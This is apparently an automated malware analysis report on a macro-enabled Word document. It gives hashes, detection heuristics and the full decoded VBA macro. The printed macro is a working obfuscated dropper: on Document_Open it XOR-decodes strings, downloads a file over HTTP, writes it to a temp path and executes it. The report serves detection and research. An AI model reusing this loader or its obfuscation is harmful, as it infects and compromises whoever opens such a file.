Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 dcad6bee084337b2…

MALICIOUS

Office (OOXML)

21.5 KB Created: 2021-03-05 20:10:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2022-07-02
MD5: 1c15a93806ee6bfa079cb5f92b61ff58 SHA-1: 7a455f6e0ddc58d4a28f67d72dd004b59897dd12 SHA-256: dcad6bee084337b2a064c1d05f7e32a0afbb86028dd5efcff9bbc8bbc27e2cc8
230 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    IpGNQwcRAAkZPjlRqmPR.Write pHnaVtDZFyeVzSKVw.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set doNrnoOMujexaYQ = CreateObject(ebszcPnwhgISPiqkopR(Array((144 + (36 - 17)), (156 Xor ((15 - 5) + 58)), 251, (11 Xor 200), 186, (33 + (195 - 4)), (211 + 14), (82 + 121), (113 Xor (23 - 11)), 238, 254, (200 - 93), (167 + 26)), Array((144 Xor 68), (38 + 133), (89 + 63), (112 Xor (219 - 26)), 211, 144, ((90 - 33) + 92), 229, ((7 - 3) Xor 10), (24 + 110), (183 - 28), (13 - 6), ((269 - 119) + 23))))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set doNrnoOMujexaYQ = CreateObject(ebszcPnwhgISPiqkopR(Array((144 + (36 - 17)), (156 Xor ((15 - 5) + 58)), 251, (11 Xor 200), 186, (33 + (195 - 4)), (211 + 14), (82 + 121), (113 Xor (23 - 11)), 238, 254, (200 - 93), (167 + 26)), Array((144 Xor 68), (38 + 133), (89 + 63), (112 Xor (219 - 26)), 211, 144, ((90 - 33) + 92), 229, ((7 - 3) Xor 10), (24 + 110), (183 - 28), (13 - 6), ((269 - 119) + 23))))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6658 bytes
SHA-256: 706d292dd1576709cdaf5fe3568a29c5fcf6089ca0766c195fc756ad4d3b47b5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Function ebszcPnwhgISPiqkopR(xraMJWRpIWoSpKldtxHo As Variant, kvSOebdLMkIqyhB As Variant)
Dim lkxUVhGCEuXxtwGtE As String
lkxUVhGCEuXxtwGtE = ""
For i = LBound(xraMJWRpIWoSpKldtxHo) To UBound(xraMJWRpIWoSpKldtxHo)
lkxUVhGCEuXxtwGtE = lkxUVhGCEuXxtwGtE & Chr(kvSOebdLMkIqyhB(i) Xor xraMJWRpIWoSpKldtxHo(i))
Next
ebszcPnwhgISPiqkopR = lkxUVhGCEuXxtwGtE
End Function
Private Sub Document_Open()
gcVapLVNMTLoJBAXz
TdFSAYvpdzQiNKTv
End Sub
Private Sub gcVapLVNMTLoJBAXz()
MsgBox ebszcPnwhgISPiqkopR(Array((433 - 212), (15 Xor 19), (0 Xor (15 - 7)), 202, (20 Xor (213 - 47)), 62, (251 - 16), (91 - 0), ((42 - 11) Xor 55), 140, 90, (435 - 216), (1 + 7), 52, (25 Xor 57)), Array(137, 116, 109, ((182 - 0) Xor 92), (142 Xor 75), 81, 153, (64 - 16), ((0 + 16) Xor (91 - 1)), 227, 53, (252 - 76), 40, (53 Xor 98), (89 - 24))) & _
ebszcPnwhgISPiqkopR(Array(204, 245, 155, ((5 + 15) Xor ((38 - 18) + 20)), 141, 235, (7 Xor (38 + 12)), 70, 41, ((169 - 80) + (137 - 5)), 205, 104, (198 - 65), (266 - 84), 120), Array((((10 - 2) + 33) Xor (62 + 77)), (236 - 81), (359 - 115), (9 + (82 - 19)), (185 - 12), 137, (1 + 79), 102, (136 - 66), (56 Xor 149), (148 + 20), 6, ((12 + (40 - 3)) Xor 209), 210, 88)) & _
ebszcPnwhgISPiqkopR(Array(8, ((18 + 14) Xor 141), 207, (178 + 77), (11 Xor (87 + (35 - 17))), ((232 - 116) + (38 - 19)), (155 + 90), (26 + 75), (1 + 136), 64, 161, 223, (51 Xor (8 + 57)), 76, 194), Array((143 - 40), (150 Xor 73), (464 - 225), (26 Xor 151), (6 Xor (1 - 0)), (93 Xor (314 - 144)), (10 Xor 158), 12, 251, (((29 - 14) + 0) Xor 42), (29 Xor 216), 255, (5 Xor 21), (78 - 25), 226)) & _
ebszcPnwhgISPiqkopR(Array(92, ((64 - 6) + 169), (117 - 48), ((5 + 10) Xor (86 + 50)), 202, (4 + 13), 233, 155, (18 + 221), 151, 29, 138, (34 + (170 - 62)), 176, 23), Array(((21 - 6) + 2), (27 + 111), (55 - 17), 245, (115 + 50), 98, 134, (138 Xor 119), (130 Xor 25), (64 Xor (69 + 178)), (26 + 56), (172 Xor 64), 232, (75 + 142), (19 + 97))) & _
ebszcPnwhgISPiqkopR(Array((145 + 24), 44, 23, (51 + (128 - 12)), 61, 114, 195, 116, 87, (198 - 76), (38 + (175 - 74)), 125, 13, 3, ((4 + 0) Xor (24 - 9))), Array(204, (4 + 8), 117, (73 + 121), 94, (12 Xor 31), 182, (0 + 7), 50, (156 - 66), 226, 9, (4 Xor 46), 112, (73 - 30))) & _
ebszcPnwhgISPiqkopR(Array((19 Xor (352 - 162)), (48 + 34), 75, (57 - 10), 195, ((59 + 65) Xor ((2 - 0) + 0)), 64, 36), Array(206, 61, (112 - 55), 93, 182, 14, (76 - 24), (2 Xor 8))), 48
End Sub
Private Sub TdFSAYvpdzQiNKTv()
Set doNrnoOMujexaYQ = CreateObject(ebszcPnwhgISPiqkopR(Array((144 + (36 - 17)), (156 Xor ((15 - 5) + 58)), 251, (11 Xor 200), 186, (33 + (195 - 4)), (211 + 14), (82 + 121), (113 Xor (23 - 11)), 238, 254, (200 - 93), (167 + 26)), Array((144 Xor 68), (38 + 133), (89 + 63), (112 Xor (219 - 26)), 211, 144, ((90 - 33) + 92), 229, ((7 - 3) Xor 10), (24 + 110), (183 - 28), (13 - 6), ((269 - 119) + 23))))
Set dMoRBnJLWbkGaTRqxPLD = CreateObject(ebszcPnwhgISPiqkopR(Array((83 + 111), (91 + (147 - 35)), 49, (55 + 46), ((9 + (13 - 5)) Xor (61 - 27)), 30, (183 Xor (22 - 9)), (115 Xor (217 - 1)), (182 - 63), (50 + 19), (131 - 53), (133 Xor ((30 - 12) + 11)), (164 - 65), (103 + 49), 214), Array((275 - 98), (137 Xor (18 + (15 - 0))), ((38 - 16) Xor (98 - 13)), 12, ((37 - 14) Xor 84), 106, 211, 197, 16, (100 Xor 15), 40, (27 Xor 234), 15, 253, 165)) & _
ebszcPnwhgISPiqkopR(Array(27, (231 Xor 30), (222 - 87), (373 - 126), 55, 121, (293 - 107), (67 + (1 - 0)), 239, 12, (208 - 97)), Array(((44 + 6) Xor 80), 138, 243, 146, 90, 22, 216, 46, 138, (114 - 3), 27)))
temp = doNrnoOMujexaYQ.ExpandEnvironmentStrings(ebszcPnwhgISPiqkopR(Array((361 - 152), 200, 7, 152, 90, 4), Array(244, 156, 66, (149 Xor 64), 10, ((27 - 9) + 15)))) & ebszcPnwhgISPiqkopR(Array((166 - 16), ((100 - 48) + 54), (91 Xor (92 - 40)), (6 Xor (39 - 8)), 26, (236 - 75), 85, 240, 193, (125 + 39), (107 + 12), (11 Xor 19)), Array((176 Xor (216 - 94)), 6, 6, ((86 - 37) Xor (26 + 49)), 127, 207, 38, (202 - 53), 239, (26 Xor 200), 21, (88 Xor (90 - 39))))
Set pHnaVtDZFyeVzSKVw = CreateObject(ebszcPnwhgISPiqkopR(Array((2 Xor 74), 66, 32, (157 Xor 54), 174, ((12 + 1) Xor 49), 113, 112, (59 + 178), 173, 10, (((4 - 0) + 3) Xor ((121 - 59) + 12)), (101 Xor 173), (86 Xor (69 + 93)), (23 Xor 65)), Array(5, 43, (80 - 13), 217, (176 Xor (89 + 24)), (43 + 36), 30, (17 + (10 - 5)), 153, 131, (28 + 54), (0 Xor 0), 132, (8 Xor (200 - 20)), (1 Xor 3))) & _
ebszcPnwhgISPiqkopR(Array(((3 - 0) Xor ((17 - 2) + 31)), ((108 - 46) Xor 254)), Array((99 Xor 26), (5 + 139))))
Set IpGNQwcRAAkZPjlRqmPR = CreateObject(ebszcPnwhgISPiqkopR(Array(96, (108 + 71), 86, 43, (7 + 112), 211, ((10 + (4 - 1)) Xor 44), 48, 3, (31 + 47), (58 + 24), 51), Array(33, (80 + 167), ((3 - 1) Xor 27), (169 - 58), 53, (381 - 128), 114, (8 Xor 76), 113, 43, (28 + 23), (8 + 86))))
pHnaVtDZFyeVzSKVw.Open ebszcPnwhgISPiqkopR(Array(76, 226, 243), Array(((2 - 1) + 10), (40 + 127), (115 + 52))), ebszcPnwhgISPiqkopR(Array(80, 162, (25 Xor (374 - 119)), 3, 188, (39 + 6), (102 + 131), (((39 - 7) + (55 - 26)) Xor 79), (0 - 0), 246, 191, 159, 83, 37, (91 - 33)), Array(56, (153 Xor 79), ((68 - 25) Xor 185), 115, 207, (23 Xor (0 + 0)), 198, ((142 - 68) Xor 23), ((27 - 8) + 83), (2 Xor (59 + 96)), (323 - 118), (216 Xor (51 - 0)), 126, 70, 85)) & _
ebszcPnwhgISPiqkopR(Array(75, (106 Xor 186), 247, (61 + 7), (364 - 171), ((36 + 41) Xor (69 + 116)), 105, 116, 184, (246 - 54), 70, (134 Xor 38), (62 Xor (123 + (83 - 39))), 240, 63), Array((57 - 19), 189, 130, ((15 - 6) + (35 - 2)), 168, (276 - 125), (3 Xor 11), 0, (393 - 184), ((213 - 55) + 17), (21 Xor 61), (33 + 178), (31 Xor 168), 147, ((26 - 0) Xor 74))) & _
ebszcPnwhgISPiqkopR(Array(229, (238 - 109), (26 Xor (389 - 180)), 82, 202, ((96 - 26) Xor ((382 - 178) + 30)), 171, 251, (205 + 5), ((101 - 45) Xor 120), ((27 + 99) Xor 251), 182, 101, 254, (4 + 108)), Array((13 + 123), 174, (202 - 13), (40 Xor 19), (224 - 49), 219, 132, (120 + (25 - 3)), 161, 37, (476 - 229), (45 + 108), 9, ((182 - 76) Xor 253), (4 + 15))) & _
ebszcPnwhgISPiqkopR(Array(78, 74, (131 + 39), 98, 109, 83, (196 - 94), (1 Xor 17)), Array((21 + 22), 36, (96 + 121), 7, 67, 56, 3, (114 - 9))), False
pHnaVtDZFyeVzSKVw.Send
IpGNQwcRAAkZPjlRqmPR.Type = 1
IpGNQwcRAAkZPjlRqmPR.Open
IpGNQwcRAAkZPjlRqmPR.Write pHnaVtDZFyeVzSKVw.responseBody
IpGNQwcRAAkZPjlRqmPR.savetofile temp, 2
doNrnoOMujexaYQ.Run temp
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 17920 bytes
SHA-256: 398d1e689d4fd66689752349a6084fb0b4f5ad93c276ed526b2e20d0f6446531

Open this report in the interactive analyzer, or submit your own file for analysis.